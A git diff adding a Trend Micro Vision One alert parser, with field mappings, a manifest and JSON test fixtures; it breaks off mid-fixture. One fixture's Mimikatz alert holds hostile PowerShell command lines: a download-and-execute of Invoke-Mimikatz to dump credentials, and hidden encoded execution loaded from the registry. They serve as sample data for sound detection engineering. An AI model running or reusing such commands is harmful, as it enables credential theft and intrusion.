diff --git a/Trend Micro/trend-micro-vision-one/CHANGELOG.md b/Trend Micro/trend-micro-vision-one/CHANGELOG.md new file mode 100644 index 000000000..11bddf32c --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/CHANGELOG.md @@ -0,0 +1,8 @@ +# Changelog + +All notable changes to this project will be documented in this file. + +The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/), +and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html). + +## [Unreleased] diff --git a/Trend Micro/trend-micro-vision-one/_meta/fields.yml b/Trend Micro/trend-micro-vision-one/_meta/fields.yml new file mode 100644 index 000000000..f18d3cb5d --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/_meta/fields.yml @@ -0,0 +1,29 @@ +trendmicro.vision_one.alert_id: + description: '' + name: trendmicro.vision_one.alert_id + type: keyword + +trendmicro.vision_one.case_id: + description: '' + name: trendmicro.vision_one.case_id + type: keyword + +trendmicro.vision_one.incident_id: + description: '' + name: trendmicro.vision_one.incident_id + type: keyword + +trendmicro.vision_one.investigation_status: + description: '' + name: trendmicro.vision_one.investigation_status + type: keyword + +trendmicro.vision_one.severity: + description: '' + name: trendmicro.vision_one.severity + type: keyword + +trendmicro.vision_one.status: + description: '' + name: trendmicro.vision_one.status + type: keyword diff --git a/Trend Micro/trend-micro-vision-one/_meta/logo.png b/Trend Micro/trend-micro-vision-one/_meta/logo.png new file mode 100644 index 000000000..e51bb3eb7 Binary files /dev/null and b/Trend Micro/trend-micro-vision-one/_meta/logo.png differ diff --git a/Trend Micro/trend-micro-vision-one/_meta/manifest.yml b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml new file mode 100644 index 000000000..da8360194 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/_meta/manifest.yml @@ -0,0 +1,11 @@ +uuid: 9844ea0a-de7f-45d4-9a9b-b07651f0630e +automation_connector_uuid: 7aa5dd7c-d694-44dd-b605-66b7974dfb05 +automation_module_uuid: 1b02d442-b804-4987-afe7-6a4be6ef35e6 +name: Trend Micro Vision One [BETA] +slug: trend-micro-vision-one + +description: >- + Trend Micro Vision One is an extended detection and response (XDR) platform that enhances threat detection, investigation, and response across multiple security layers. It provides a centralized view for improved security posture and faster threat remediation. + +data_sources: + Process monitoring: diff --git a/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json b/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json new file mode 100644 index 000000000..742eee7cc --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/_meta/smart-descriptions.json @@ -0,0 +1,10 @@ +[ + { + "value": "{event.reason} on {host.ip}", + "conditions": [{ "field": "event.reason" }, { "field": "host.ip" }] + }, + { + "value": "{event.reason}", + "conditions": [{ "field": "event.reason" }] + } +] diff --git a/Trend Micro/trend-micro-vision-one/ingest/parser.yml b/Trend Micro/trend-micro-vision-one/ingest/parser.yml new file mode 100644 index 000000000..09ca7f331 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/ingest/parser.yml @@ -0,0 +1,91 @@ +name: trend-micro-vision-one +ignored_values: [] +pipeline: + - name: parsed_event + external: + name: json.parse-json + properties: + input_field: "{{original.message}}" + output_field: message + + - name: set_ecs_fields + +stages: + set_ecs_fields: + actions: + - set: + event.kind: alert + event.category: ["intrusion_detection"] + event.type: ["info"] + observer.vendor: "TrendMicro" + observer.product: "Vision One" + + event.reason: "{{parsed_event.message.model}}" + + - set: + "@timestamp": "{{parsed_event.message.createdDateTime}}" + + host.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.name }}" + host.ip: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'host') | first).entityValue.ips }}" + + user.email: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'emailAddress') | first).entityValue }}" + container.name: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'container') | first).entityValue }}" + container.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'container') | first).entityId }}" + + rule.name: "{{parsed_event.message.model}}" + rule.id: "{{parsed_event.message.model.modelId}}" + + event.url: "{{parsed_event.message.model.workbenchLink}}" + + - set: + user.id: "{{ (parsed_event.message.impactScope.entities | selectattr('entityType', 'equalto', 'account') | first).entityValue }}" + + - set: + user.name: "{{final.user.id.split('\\\\') | last}}" + user.domain: "{{final.user.id.split('\\\\') | first}}" + filter: "{{final.user.id != null}}" + + - set: + process.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processCmd') | first).value }}" + process.parent.command_line: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentCmd') | first).value }}" + process.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFilePath') | first).value }}" + process.parent.executable: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'parentFilePath') | first).value }}" + process.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha1') | first).value }}" + process.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'processFileHashSha256') | first).value }}" + process.pid: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectPid') | first).value }}" + + - set: + registry.hive: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[0] }}" + registry.key: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_key') | first).value.split('\\\\')[1:] | join('\\\\') }}" + registry.value: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value') | first).value }}" + registry.path: > + {%- set path = [] -%} + {%- for indicator in parsed_event.message.indicators -%} + {%- if indicator.type == 'registry_key' -%}{%- set path = path.append(indicator.value) -%}{% endif %} + {%- endfor -%} + {%- for indicator in parsed_event.message.indicators -%} + {%- if indicator.type == 'registry_value' -%}{%- set path = path.append(indicator.value) -%}{% endif %} + {%- endfor -%} + {%- if path | length > 0 -%}{{ path | join('\\') }}{%- endif -%} + + registry.data.strings: "{{ (parsed_event.message.indicators | selectattr('type', 'equalto', 'registry_value_data') | first).value }}" + + - set: + registry.data.type: "REG_SZ" + filter: "{{final.registry.data.strings != null }}" + + - set: + file.hash.sha1: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha1') | first).value }}" + file.hash.sha256: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFileHashSha256') | first).value }}" + file.path: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'objectFilePath') | first).value or (parsed_event.message.indicators | selectattr('field', 'equalto', 'filePath') | first).value}}" + file.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'fileName') | first).value }}" + + user.name: "{{ (parsed_event.message.indicators | selectattr('field', 'equalto', 'logonUser') | first).value }}" + + - set: + trendmicro.vision_one.severity: "{{parsed_event.message.severity}}" + trendmicro.vision_one.incident_id: "{{parsed_event.message.incidentId}}" + trendmicro.vision_one.case_id: "{{parsed_event.message.caseId}}" + trendmicro.vision_one.alert_id: "{{parsed_event.message.id}}" + trendmicro.vision_one.status: "{{parsed_event.message.status}}" + trendmicro.vision_one.investigation_status: "{{parsed_event.message.investigationStatus}}" diff --git a/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json new file mode 100644 index 000000000..b31951fe2 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/tests/test_internal_network_scanner.json @@ -0,0 +1,72 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.15\", \"id\": \"WB-11111-22222222-00000\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://portal.eu.xdr.trendmicro.com/index.html#/workbench/alerts/WB-11111-22222222-00000?ref=7ddf32e17a6ac5ce04a8ecbf782ca509\", \"alertProvider\": \"SAE\", \"modelId\": \"fc93e58b-142a-46bd-89b3-0670004728da\", \"model\": \"Internal Network Scanner\", \"modelType\": \"preset\", \"score\": 22, \"severity\": \"low\", \"createdDateTime\": \"2024-07-23T14:46:11Z\", \"updatedDateTime\": \"2024-07-23T14:46:11Z\", \"ownerIds\": [], \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"john\\\\doe\", \"entityId\": \"john\\\\doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"name\": \"doe10\", \"ips\": [\"1.2.3.4\"]}, \"entityId\": \"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\", \"relatedEntities\": [\"john\\\\doe\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7, 8], \"provenance\": [\"Sweeping\", \"Alert\"], \"managementScopeGroupId\": \"a008286d-c35c-4b85-85bb-6c744b27c2e7\"}]}, \"description\": \"Detects usage of network scanner to gather information\", \"matchedRules\": [{\"id\": \"1382c167-1c06-4312-89bd-2db0573a0a3e\", \"name\": \"Internal Network Scanning\", \"matchedFilters\": [{\"id\": \"95fa94aa-126d-40a1-92dd-e4427da20897\", \"name\": \"Internal Network Scanning via Famatech Scanner Tools\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"mitreTechniqueIds\": [\"T1046\"], \"matchedEvents\": [{\"uuid\": \"47028c1b-ba5b-45ec-98b0-2f62b8ee1665\", \"matchedDateTime\": \"2024-07-23T14:41:48.126Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"C:\\\\WINDOWS\\\\Explorer.EXE\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"\\\"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\\\" \", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"file_sha256\", \"field\": \"objectFileHashSha256\", \"value\": \"E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha256\", \"field\": \"processFileHashSha256\", \"value\": \"B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"C:\\\\Windows\\\\explorer.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"C:\\\\Users\\\\doe.john\\\\Downloads\\\\Advanced_IP_Scanner_2.5.4594.1.exe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"user_account\", \"field\": \"logonUser\", \"value\": \"doe\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [\"95fa94aa-126d-40a1-92dd-e4427da20897\"], \"provenance\": [\"Related Asset Enrichment\", \"Alert\"]}, {\"id\": 8, \"type\": \"user_account\", \"field\": \"\", \"value\": \"Syst\\u00e8me\", \"relatedEntities\": [\"3F783642-C0D0-4AFD-84B6-F6751E5BF80F\"], \"filterIds\": [], \"provenance\": [\"Related Asset Enrichment\"]}]}", + "event": { + "category": [ + "intrusion_detection" + ], + "kind": "alert", + "reason": "Internal Network Scanner", + "type": [ + "info" + ] + }, + "@timestamp": "2024-07-23T14:46:11Z", + "file": { + "directory": "C:\\Users\\doe.john\\Downloads", + "hash": { + "sha256": "E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1" + }, + "name": "Advanced_IP_Scanner_2.5.4594.1.exe", + "path": "C:\\Users\\doe.john\\Downloads\\Advanced_IP_Scanner_2.5.4594.1.exe" + }, + "host": { + "ip": [ + "1.2.3.4" + ], + "name": "doe10" + }, + "observer": { + "product": "Vision One", + "vendor": "TrendMicro" + }, + "process": { + "command_line": "C:\\WINDOWS\\Explorer.EXE", + "executable": "C:\\Windows\\explorer.exe", + "hash": { + "sha256": "B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631" + } + }, + "related": { + "hash": [ + "B9AB76C0E991FED29CF07956B7B5E758DB91BEF52E4C0FA810FEF88000506631", + "E665BB196B40DBB0FA91DBB908DB7DA5065BA28DF9F445AD97C17DF180FF43A1" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "doe" + ] + }, + "rule": { + "name": "Internal Network Scanner" + }, + "trendmicro": { + "vision_one": { + "alert_id": "WB-11111-22222222-00000", + "investigation_status": "New", + "severity": "low", + "status": "Open" + } + }, + "user": { + "domain": "john", + "id": "john\\doe", + "name": "doe" + } + } +} \ No newline at end of file diff --git a/Trend Micro/trend-micro-vision-one/tests/test_process.json b/Trend Micro/trend-micro-vision-one/tests/test_process.json new file mode 100644 index 000000000..9c013b1c0 --- /dev/null +++ b/Trend Micro/trend-micro-vision-one/tests/test_process.json @@ -0,0 +1,71 @@ +{ + "input": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00023\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Credential Dumping via Mimikatz\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"createdDateTime\": \"2022-09-06T02:49:30Z\", \"updatedDateTime\": \"2022-09-06T02:49:50Z\", \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user obtained account logon information that can be used to access remote systems via Mimikatz.\", \"matchedRules\": [{\"id\": \"1288958d-3062-4a75-91fc-51b2a49bc7d7\", \"name\": \"Potential Credential Dumping via Mimikatz\", \"matchedFilters\": [{\"id\": \"49d327c4-361f-43f0-b66c-cab433495e42\", \"name\": \"Possible Credential Dumping via Mimikatz\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"mitreTechniqueIds\": [\"V9.T1003.001\", \"V9.T1059.003\", \"V9.T1212\"], \"matchedEvents\": [{\"uuid\": \"e168a6e5-27b1-462b-ad3e-5146df4e6aa5\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe \\\"iex (new-object net.webclient).downloadstring(\\\" \\\"https://raw.githubusercontent.com/mattifestation/powersploit/master/exfiltration/invoke-mimikatz.ps1); invoke-mimikatz -dumpcreds\\\"\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\\\microsoft\\\\windows update).update); powershell -nop -noni -w hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha1\", \"field\": \"objectFileHashSha1\", \"value\": \"1B3B40FBC889FD4C645CC12C85D0805AC36BA254\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 7, \"type\": \"text\", \"field\": \"endpointHostName\", \"value\": \"Nimda\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}]}" + }, + "expected": { + "message": "{\"schemaVersion\": \"1.12\", \"id\": \"WB-9002-20220906-00023\", \"investigationStatus\": \"New\", \"status\": \"Open\", \"investigationResult\": \"No Findings\", \"workbenchLink\": \"https://THE_WORKBENCH_URL\", \"alertProvider\": \"SAE\", \"modelId\": \"1ebd4f91-4b28-40b4-87f5-8defee4791d8\", \"model\": \"Credential Dumping via Mimikatz\", \"modelType\": \"preset\", \"score\": 64, \"severity\": \"high\", \"createdDateTime\": \"2022-09-06T02:49:30Z\", \"updatedDateTime\": \"2022-09-06T02:49:50Z\", \"impactScope\": {\"desktopCount\": 1, \"serverCount\": 0, \"accountCount\": 1, \"emailAddressCount\": 0, \"containerCount\": 0, \"cloudIdentityCount\": 0, \"entities\": [{\"entityType\": \"account\", \"entityValue\": \"shockwave\\\\sam\", \"entityId\": \"shockwave\\\\sam\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"relatedIndicatorIds\": [], \"provenance\": [\"Alert\"]}, {\"entityType\": \"host\", \"entityValue\": {\"guid\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"name\": \"nimda\", \"ips\": [\"10.10.58.51\"]}, \"entityId\": \"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\", \"managementScopeGroupId\": \"deadbeef-292e-42ae-86be-d2fef483a248\", \"managementScopeInstanceId\": \"1babc299-52de-44f4-a1d2-8a224f391eee\", \"managementScopePartitionKey\": \"4c1850c0-8a2a-4637-9f88-6afbab54dd79\", \"relatedEntities\": [\"shockwave\\\\sam\"], \"relatedIndicatorIds\": [1, 2, 3, 4, 5, 6, 7], \"provenance\": [\"Alert\"]}]}, \"description\": \"A user obtained account logon information that can be used to access remote systems via Mimikatz.\", \"matchedRules\": [{\"id\": \"1288958d-3062-4a75-91fc-51b2a49bc7d7\", \"name\": \"Potential Credential Dumping via Mimikatz\", \"matchedFilters\": [{\"id\": \"49d327c4-361f-43f0-b66c-cab433495e42\", \"name\": \"Possible Credential Dumping via Mimikatz\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"mitreTechniqueIds\": [\"V9.T1003.001\", \"V9.T1059.003\", \"V9.T1212\"], \"matchedEvents\": [{\"uuid\": \"e168a6e5-27b1-462b-ad3e-5146df4e6aa5\", \"matchedDateTime\": \"2022-09-05T03:53:57.199Z\", \"type\": \"TELEMETRY_PROCESS\"}]}]}], \"indicators\": [{\"id\": 1, \"type\": \"command_line\", \"field\": \"objectCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe \\\"iex (new-object net.webclient).downloadstring(\\\" \\\"https://raw.githubusercontent.com/mattifestation/powersploit/master/exfiltration/invoke-mimikatz.ps1); invoke-mimikatz -dumpcreds\\\"\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 2, \"type\": \"command_line\", \"field\": \"processCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -enc ......aakaakaekavgaracqaswapackafabjaeuawaa=\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 3, \"type\": \"command_line\", \"field\": \"parentCmd\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe -nop -noni -w hidden -c $x=$((gp hkcu:software\\\\microsoft\\\\windows update).update); powershell -nop -noni -w hidden -enc $x\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 4, \"type\": \"file_sha1\", \"field\": \"objectFileHashSha1\", \"value\": \"1B3B40FBC889FD4C645CC12C85D0805AC36BA254\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 5, \"type\": \"fullpath\", \"field\": \"objectFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": [\"35FA11DA-A24E-40CF-8B56-BAF8828CC15E\"], \"filterIds\": [\"49d327c4-361f-43f0-b66c-cab433495e42\"], \"provenance\": [\"Alert\"]}, {\"id\": 6, \"type\": \"fullpath\", \"field\": \"processFilePath\", \"value\": \"c:\\\\windows\\\\system32\\\\windowspowershell\\\\v1.0\\\\powershell.exe\", \"relatedEntities\": 